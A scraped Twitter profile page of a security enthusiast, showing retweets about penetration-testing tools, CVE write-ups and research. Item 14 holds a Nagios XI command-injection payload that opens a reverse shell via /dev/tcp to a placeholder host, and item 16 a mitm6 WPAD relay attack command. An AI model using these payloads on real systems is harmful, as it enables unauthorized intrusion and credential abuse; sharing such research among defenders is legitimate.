Dark

@D4rk36

Security Enthusiast | OSCP | OSCE | OSWP | Python Lover

127.0.1.1
Vrijeme pridruživanja: rujan 2012.

Tweetovi

Blokirali ste korisnika/cu @D4rk36

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @D4rk36

  1. proslijedio/la je Tweet
    28. sij

    hacker-roadmap : A guide for amateurs pen testers and a collection of hacking tools, resources and references to practice ethical hacking, pen testing and web security : cc

    Poništi
  2. proslijedio/la je Tweet
    19. sij

    BruteSpray is a Python script capable of processing an Nmap scan output and automating brute-force attacks against discovered services.

    Poništi
  3. proslijedio/la je Tweet
    18. sij

    Just published a blog post talking about some iOS kernel framebuffer research I’ve been looking at over the last couple weeks. Have a read if you’re interested :)

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    19. sij

    Now UEFI_RETool IDA plugin can display the sequence of execution of UEFI images and dependencies between images

    Poništi
  5. proslijedio/la je Tweet
    19. sij
    Poništi
  6. proslijedio/la je Tweet
    19. sij

    Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder

    Poništi
  7. proslijedio/la je Tweet
    18. sij

    DevOps Questions & Exercises ( incl. Linux, Jenkins, AWS, SRE, Prometheus, Docker, Python, Ansible, Git, Kubernetes, Terraform, OpenStack, SQL, NoSQL, Azure, GCP, DNS, Elastic, Network, Virtualization - Overall 834 questions):

    Poništi
  8. proslijedio/la je Tweet
    19. sij

    Reverse Engineering the BMW Connected Apps Protocol :

    Poništi
  9. proslijedio/la je Tweet

    My analysis of Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610 is up.

    Poništi
  10. proslijedio/la je Tweet
    17. sij

    I just published a video explaining the details of CVE-2020-0601 aka Curveball: The Microsoft CryptoAPI vulnerability that was reported by the NSA.

    Poništi
  11. proslijedio/la je Tweet
    18. sij
    Poništi
  12. proslijedio/la je Tweet
    9. sij

    Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fix, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)

    Poništi
  13. proslijedio/la je Tweet
    11. sij

    We have just released a new tool for exploiting CVE-2019-19781. Our goal was to keep private as long as possible to have a longer window to fix. Other researchers have published the exploit code in the wild already. Cats out of the bag.

    Poništi
  14. proslijedio/la je Tweet
    8. sij

    CVE-2019-20197 Nagios XI远程命令执行漏洞 RCE <= v5.6.9 (需要身份认证) http://x.x.x.x/nagiosxi//includes/components/scheduledreporting/schedulereport.php Post : id=a";/bin/bash -l > /dev/tcp/x.x.x.x/8989 0<&1 2>&1;

    Poništi
  15. proslijedio/la je Tweet
    7. sij

    Today the Superion fuzzer is not anymore open-source on GitHub () so I created an organization called Fuzzers-Archive that aims to collect unmaintained fuzzers to prevent this situation. Open an issue to ask for additions:

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    7. sij

    It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> –k –no-pass <VictimPC>

    Poništi
  17. proslijedio/la je Tweet
    6. sij

    Old stuff, new blogpost: Breaking PHP mt_rand() with math

    Poništi
  18. proslijedio/la je Tweet
    6. sij

    Sub-Domain TakeOver Vulnerability Scanner Recursive DNS Subdomain Enumerator ReconPi - A lightweight recon tool Fetch all public IP addresses tied to your AWS account

    Poništi
  19. proslijedio/la je Tweet
    6. sij

    Abusing the COM Registry Structure: CLSID, LocalServer32, & InprocServer32, by

    Poništi
  20. proslijedio/la je Tweet
    5. sij
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·